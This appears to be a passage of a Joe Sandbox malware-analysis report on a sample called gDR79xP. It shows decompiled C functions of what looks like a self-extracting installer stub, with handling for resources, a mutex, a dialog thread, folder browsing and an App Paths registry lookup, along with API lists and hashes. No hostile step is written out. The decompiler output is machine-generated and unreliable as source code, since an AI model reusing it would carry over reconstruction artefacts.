                                                                                                                                                                                                                                                0x00102d34
                                                                                                                                                                                                                                                0x00102d3b
                                                                                                                                                                                                                                                0x00102d40
                                                                                                                                                                                                                                                0x00102d48
                                                                                                                                                                                                                                                0x00102d59
                                                                                                                                                                                                                                                0x00102d84
                                                                                                                                                                                                                                                0x00102e1f
                                                                                                                                                                                                                                                0x00102e1f
                                                                                                                                                                                                                                                0x00102e2e
                                                                                                                                                                                                                                                0x00102e41
                                                                                                                                                                                                                                                0x00102e5a
                                                                                                                                                                                                                                                0x00102e62
                                                                                                                                                                                                                                                0x00102e6c
                                                                                                                                                                                                                                                0x00102e6c
                                                                                                                                                                                                                                                0x00102e75
                                                                                                                                                                                                                                                0x00102e77
                                                                                                                                                                                                                                                0x00102e77
                                                                                                                                                                                                                                                0x00102e84
                                                                                                                                                                                                                                                0x00102e8b
                                                                                                                                                                                                                                                0x00102e94
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102e96
                                                                                                                                                                                                                                                0x00102e96
                                                                                                                                                                                                                                                0x00102e9e
                                                                                                                                                                                                                                                0x00102ea2
                                                                                                                                                                                                                                                0x00102eba
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102ece
                                                                                                                                                                                                                                                0x00102ede
                                                                                                                                                                                                                                                0x00102eed
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102eed
                                                                                                                                                                                                                                                0x00102eef
                                                                                                                                                                                                                                                0x00102eef
                                                                                                                                                                                                                                                0x00102eef
                                                                                                                                                                                                                                                0x00102eef
                                                                                                                                                                                                                                                0x00102ea2
                                                                                                                                                                                                                                                0x00102e86
                                                                                                                                                                                                                                                0x00102e88
                                                                                                                                                                                                                                                0x00102e88
                                                                                                                                                                                                                                                0x00102e43
                                                                                                                                                                                                                                                0x00102e48
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102e48
                                                                                                                                                                                                                                                0x00102e30
                                                                                                                                                                                                                                                0x00102e30
                                                                                                                                                                                                                                                0x00102ef8
                                                                                                                                                                                                                                                0x00102f01
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102f01
                                                                                                                                                                                                                                                0x00102d8a
                                                                                                                                                                                                                                                0x00102d8f
                                                                                                                                                                                                                                                0x00102da1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102da3
                                                                                                                                                                                                                                                0x00102dae
                                                                                                                                                                                                                                                0x00102db4
                                                                                                                                                                                                                                                0x00102dbb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102dca
                                                                                                                                                                                                                                                0x00102dd3
                                                                                                                                                                                                                                                0x00102df5
                                                                                                                                                                                                                                                0x00102e02
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102dd5
                                                                                                                                                                                                                                                0x00102dde
                                                                                                                                                                                                                                                0x00102de3
                                                                                                                                                                                                                                                0x00102e04
                                                                                                                                                                                                                                                0x00102e0a
                                                                                                                                                                                                                                                0x00102e10
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102e10
                                                                                                                                                                                                                                                0x00102dd3
                                                                                                                                                                                                                                                0x00102dbb
                                                                                                                                                                                                                                                0x00102da1
                                                                                                                                                                                                                                                0x00102d5b
                                                                                                                                                                                                                                                0x00102d5b
                                                                                                                                                                                                                                                0x00102d5d
                                                                                                                                                                                                                                                0x00102d69
                                                                                                                                                                                                                                                0x00102d6e
                                                                                                                                                                                                                                                0x00102f06
                                                                                                                                                                                                                                                0x00102f06
                                                                                                                                                                                                                                                0x00102f06
                                                                                                                                                                                                                                                0x00102d59
                                                                                                                                                                                                                                                0x00102f18

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00102CD9
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00102CE9
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00102CF9
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046A0
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: SizeofResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046A9
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046C3
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: LoadResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046CC
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: LockResource.KERNEL32(00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046D3
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: memcpy_s.MSVCRT ref: 001046E5
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001046EF
                                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00102D34
                                                                                                                                                                                                                                                • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00102D40
                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00102DAE
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00102DBD
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00102E0A
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00104518
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00104554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                                • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                                                                                                                                                                                                                                                • API String ID: 1002816675-2993962200
                                                                                                                                                                                                                                                • Opcode ID: 835c42a2572cdb3362b05837bb36588a88de337350b7fede026e0ee7ca260f25
                                                                                                                                                                                                                                                • Instruction ID: b88fa52d1a0394babf36af1b3405c47e028058f462f6f95c92624166e3cbfb69
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 835c42a2572cdb3362b05837bb36588a88de337350b7fede026e0ee7ca260f25
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF5107B0384301ABE724A734CD5EB7B3699EB55750F548029FAC1D69E5DBF88C81C621
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 001034F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119threadwindowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 81%
                                                                                                                                                                                                                                                			E001034F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0x1091d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0x108584 = _t35;
					E001043D0(_t35, GetDesktopWindow());
					__eflags =  *0x108184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "lenta");
					_t17 = CreateThread(0, 0, E00104FE0, 0, 0, 0x108798);
					 *0x10879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E001044B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0x10858c);
					_t38 =  *0x108584; // 0x0
					_t25 = E001044B9(_t38, 0x4b2, 0x101140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0x1091d8 = 1;
						SetEvent( *0x10858c);
						_t39 =  *0x10879c; // 0x0
						E00103680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0x10858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0x10879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}












                                                                                                                                                                                                                                                0x001034fb
                                                                                                                                                                                                                                                0x001034fe
                                                                                                                                                                                                                                                0x00103665
                                                                                                                                                                                                                                                0x00103666
                                                                                                                                                                                                                                                0x00103666
                                                                                                                                                                                                                                                0x00103668
                                                                                                                                                                                                                                                0x0010366e
                                                                                                                                                                                                                                                0x0010366e
                                                                                                                                                                                                                                                0x00103671
                                                                                                                                                                                                                                                0x00103671
                                                                                                                                                                                                                                                0x00103677
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103677
                                                                                                                                                                                                                                                0x00103504
                                                                                                                                                                                                                                                0x00103506
                                                                                                                                                                                                                                                0x00103507
                                                                                                                                                                                                                                                0x0010350c
                                                                                                                                                                                                                                                0x0010365b
                                                                                                                                                                                                                                                0x0010365f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103661
                                                                                                                                                                                                                                                0x00103512
                                                                                                                                                                                                                                                0x00103515
                                                                                                                                                                                                                                                0x001035be
                                                                                                                                                                                                                                                0x001035c1
                                                                                                                                                                                                                                                0x001035d1
                                                                                                                                                                                                                                                0x001035d8
                                                                                                                                                                                                                                                0x001035de
                                                                                                                                                                                                                                                0x001035f8
                                                                                                                                                                                                                                                0x00103617
                                                                                                                                                                                                                                                0x00103617
                                                                                                                                                                                                                                                0x00103623
                                                                                                                                                                                                                                                0x00103637
                                                                                                                                                                                                                                                0x0010363d
                                                                                                                                                                                                                                                0x00103642
                                                                                                                                                                                                                                                0x00103644
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103646
                                                                                                                                                                                                                                                0x00103652
                                                                                                                                                                                                                                                0x00103657
                                                                                                                                                                                                                                                0x00103658
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103658
                                                                                                                                                                                                                                                0x00103644
                                                                                                                                                                                                                                                0x0010351b
                                                                                                                                                                                                                                                0x0010351d
                                                                                                                                                                                                                                                0x0010354f
                                                                                                                                                                                                                                                0x00103553
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010355f
                                                                                                                                                                                                                                                0x00103565
                                                                                                                                                                                                                                                0x0010357c
                                                                                                                                                                                                                                                0x00103581
                                                                                                                                                                                                                                                0x00103584
                                                                                                                                                                                                                                                0x0010359b
                                                                                                                                                                                                                                                0x001035a1
                                                                                                                                                                                                                                                0x001035a7
                                                                                                                                                                                                                                                0x001035ad
                                                                                                                                                                                                                                                0x001035b3
                                                                                                                                                                                                                                                0x001035b8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001035b8
                                                                                                                                                                                                                                                0x00103586
                                                                                                                                                                                                                                                0x00103588
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103590
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103590
                                                                                                                                                                                                                                                0x00103524
                                                                                                                                                                                                                                                0x00103535
                                                                                                                                                                                                                                                0x00103541
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103549
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • TerminateThread.KERNEL32(00000000), ref: 00103535
                                                                                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 00103541
                                                                                                                                                                                                                                                • ResetEvent.KERNEL32 ref: 0010355F
                                                                                                                                                                                                                                                • SetEvent.KERNEL32(00101140,00000000,00000020,00000004), ref: 00103590
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 001035C7
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000083B), ref: 001035F1
                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000), ref: 001035F8
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000083B), ref: 00103610
                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000), ref: 00103617
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 00103623
                                                                                                                                                                                                                                                • CreateThread.KERNEL32 ref: 00103637
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 00103671
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                                • String ID: lenta
                                                                                                                                                                                                                                                • API String ID: 2406144884-2780258678
                                                                                                                                                                                                                                                • Opcode ID: 928aaa9d7892ccc6a7454cdb72206d18f2ae1965a22db6307e538e539563002a
                                                                                                                                                                                                                                                • Instruction ID: 666bb057abcf8662cc60966b0ec3d427243d22f564a3874342a29b17b316aabd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 928aaa9d7892ccc6a7454cdb72206d18f2ae1965a22db6307e538e539563002a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C531EF70244301BBD7211F25EC4DE2A3A6DFB89B00F904529F7E295AF1CBF28A80CB55
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00104224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                                                                                                                			E00104224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E001044B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0x1088c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0x1087a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0x108598;
					_v36 = 1;
					_v32 = E00104200;
					_v28 = 0x1088c0;
					 *0x10a288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0x10a288(_t32, 0x1088c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0x1088c0 != 0) {
							E00101680(0x1087a0, 0x104, 0x1088c0);
						}
						 *0x10a288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0x1087a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0x1088c0);
					_t61 = 0x1088c0;
					_t4 =  &(_t61[1]); // 0x1088c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0x1088c0; // 0x211181
					_t44 = CharPrevA(0x1088c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0x1088c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}




























                                                                                                                                                                                                                                                0x00104234
                                                                                                                                                                                                                                                0x0010423c
                                                                                                                                                                                                                                                0x00104240
                                                                                                                                                                                                                                                0x001043b2
                                                                                                                                                                                                                                                0x001043b7
                                                                                                                                                                                                                                                0x001043c0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001043c5
                                                                                                                                                                                                                                                0x0010424c
                                                                                                                                                                                                                                                0x00104252
                                                                                                                                                                                                                                                0x00104257
                                                                                                                                                                                                                                                0x001043a4
                                                                                                                                                                                                                                                0x001043a5
                                                                                                                                                                                                                                                0x001043ab
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001043ab
                                                                                                                                                                                                                                                0x00104263
                                                                                                                                                                                                                                                0x00104269
                                                                                                                                                                                                                                                0x0010426e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010427a
                                                                                                                                                                                                                                                0x00104280
                                                                                                                                                                                                                                                0x00104285
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010428d
                                                                                                                                                                                                                                                0x00104293
                                                                                                                                                                                                                                                0x001042e6
                                                                                                                                                                                                                                                0x001042e9
                                                                                                                                                                                                                                                0x001042ef
                                                                                                                                                                                                                                                0x001042f4
                                                                                                                                                                                                                                                0x001042f7
                                                                                                                                                                                                                                                0x00104300
                                                                                                                                                                                                                                                0x00104307
                                                                                                                                                                                                                                                0x0010430e
                                                                                                                                                                                                                                                0x00104315
                                                                                                                                                                                                                                                0x0010431c
                                                                                                                                                                                                                                                0x00104322
                                                                                                                                                                                                                                                0x00104326
                                                                                                                                                                                                                                                0x0010432d
                                                                                                                                                                                                                                                0x0010432d
                                                                                                                                                                                                                                                0x0010432f
                                                                                                                                                                                                                                                0x00104334
                                                                                                                                                                                                                                                0x00104343
                                                                                                                                                                                                                                                0x00104349
                                                                                                                                                                                                                                                0x0010434d
                                                                                                                                                                                                                                                0x00104354
                                                                                                                                                                                                                                                0x00104354
                                                                                                                                                                                                                                                0x0010435d
                                                                                                                                                                                                                                                0x0010436e
                                                                                                                                                                                                                                                0x0010436e
                                                                                                                                                                                                                                                0x0010437d
                                                                                                                                                                                                                                                0x00104383
                                                                                                                                                                                                                                                0x00104387
                                                                                                                                                                                                                                                0x0010438e
                                                                                                                                                                                                                                                0x0010438e
                                                                                                                                                                                                                                                0x00104387
                                                                                                                                                                                                                                                0x00104391
                                                                                                                                                                                                                                                0x00104399
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00104295
                                                                                                                                                                                                                                                0x0010429f
                                                                                                                                                                                                                                                0x001042a5
                                                                                                                                                                                                                                                0x001042aa
                                                                                                                                                                                                                                                0x001042aa
                                                                                                                                                                                                                                                0x001042ad
                                                                                                                                                                                                                                                0x001042ad
                                                                                                                                                                                                                                                0x001042af
                                                                                                                                                                                                                                                0x001042b0
                                                                                                                                                                                                                                                0x001042b6
                                                                                                                                                                                                                                                0x001042c2
                                                                                                                                                                                                                                                0x001042c8
                                                                                                                                                                                                                                                0x001042ce
                                                                                                                                                                                                                                                0x001042e4
                                                                                                                                                                                                                                                0x001042e4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001042ce

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00104236
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0010424C
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00104263
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0010427A
                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,001088C0,?,00000001), ref: 0010429F
                                                                                                                                                                                                                                                • CharPrevA.USER32(001088C0,00211181,?,00000001), ref: 001042C2
                                                                                                                                                                                                                                                • CharPrevA.USER32(001088C0,00000000,?,00000001), ref: 001042D6
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00104391
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 001043A5
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                                • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                                • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                                • Opcode ID: 0c74bb76ac5e17ddb96692bc2b2d70ac58b139f932b424ee4ace6c955ba4ebfe
                                                                                                                                                                                                                                                • Instruction ID: 97621382d7186e947a0a4b524dd7df3743dba89d9394622b9ce9090324dc714d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c74bb76ac5e17ddb96692bc2b2d70ac58b139f932b424ee4ace6c955ba4ebfe
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D841D3B4A04318AFE711AB64EC98A6E7BB4FF45344F94416AFAC1A72D1CBF48C41C761
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00102773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114registryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E00102773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0x108004; // 0xb5a2e1bc
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E00101781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E0010658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E0010658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0x101140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E00101680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E00106CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}























                                                                                                                                                                                                                                                0x00102773
                                                                                                                                                                                                                                                0x0010277e
                                                                                                                                                                                                                                                0x00102785
                                                                                                                                                                                                                                                0x0010278a
                                                                                                                                                                                                                                                0x0010278d
                                                                                                                                                                                                                                                0x00102790
                                                                                                                                                                                                                                                0x00102792
                                                                                                                                                                                                                                                0x00102798
                                                                                                                                                                                                                                                0x0010279d
                                                                                                                                                                                                                                                0x001028b2
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001027a3
                                                                                                                                                                                                                                                0x001027a3
                                                                                                                                                                                                                                                0x001027af
                                                                                                                                                                                                                                                0x001027c2
                                                                                                                                                                                                                                                0x001027c8
                                                                                                                                                                                                                                                0x001027cd
                                                                                                                                                                                                                                                0x001027d5
                                                                                                                                                                                                                                                0x001028b7
                                                                                                                                                                                                                                                0x001028b9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001027db
                                                                                                                                                                                                                                                0x001027dd
                                                                                                                                                                                                                                                0x001028aa
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001027e3
                                                                                                                                                                                                                                                0x001027e3
                                                                                                                                                                                                                                                0x001027ec
                                                                                                                                                                                                                                                0x001027f8
                                                                                                                                                                                                                                                0x00102803
                                                                                                                                                                                                                                                0x0010280b
                                                                                                                                                                                                                                                0x00102831
                                                                                                                                                                                                                                                0x001028c3
                                                                                                                                                                                                                                                0x001028c9
                                                                                                                                                                                                                                                0x001028cd
